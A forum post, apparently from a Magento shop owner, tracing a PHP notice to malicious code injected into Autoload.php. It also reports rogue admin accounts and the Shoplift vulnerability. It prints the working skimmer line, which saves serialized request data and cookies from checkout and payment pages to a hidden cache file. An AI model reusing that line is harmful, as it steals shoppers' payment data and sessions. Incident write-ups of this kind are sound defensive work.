From this morning, I get the following PHP Note after starting the Magento cronjob:
Undefined index: REQUEST_URI in /htdocs/lib/Varien/Autoload.php on line 1
I did not modify any of the mage files. How is this possible?
EDIT: At the moment, I edited Autoload.php to first check if REQUEST_URI is set.
Original:
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
New:
<?php if(isset($_SERVER["REQUEST_URI"]) && preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
EDIT 30-04-2015:
After reading the comments of @volkan and @ b.enoit.be, I immediately replaced the specified page with the original one from Magento, and the line really was not present!
Below is the malicious string present in Autoload.php
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>
I also checked:
- /js/index.php similar to the original
- /index.php as the original
- Magpleasure_Filesystem module was not present
However .. there were two new administrators who had obscure names:
- backup copy - auto_bc@magent.com <- this domain leads to the domain containing the pages, and the email contains Russian results on Google
- database - db@local.host
Both users have been deleted. The website was also vulnerable to the shoplift exploit (which is fixed in the latest security patch)
We are currently busy installing the latest security fixes.
This seems to be a recent issue:
100,000 web stores are open to compromise, because attackers use the error Magento Magento Shoplift Bug Tester v1.0
Thanks to all users for their help.